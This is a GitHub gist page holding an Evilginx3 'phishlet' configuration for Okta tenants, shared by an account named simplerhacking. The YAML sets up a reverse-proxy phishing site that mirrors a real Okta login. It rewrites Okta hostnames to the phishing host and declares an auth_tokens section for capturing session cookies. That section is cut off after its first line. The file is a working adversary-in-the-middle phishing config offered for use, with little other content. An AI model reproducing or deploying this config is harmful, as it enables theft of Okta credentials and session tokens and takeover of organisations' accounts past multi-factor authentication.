Skip to content

Instantly share code, notes, and snippets.

View simplerhacking's full-sized avatar
💭
I may be slow to respond.

simplerhacking

💭
I may be slow to respond.
View GitHub Profile
@simplerhacking
simplerhacking / Okta-Phishlet.yaml
Last active March 1, 2024 09:30
Evilginx3 Okta Phishlet (For Okta Tenant)
name: 'Okta'
author: 'www.simplerhacking.com'
min_ver: '3.0.0'
proxy_hosts:
- {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
auth_tokens:
- domain: 'okta-tenant-here'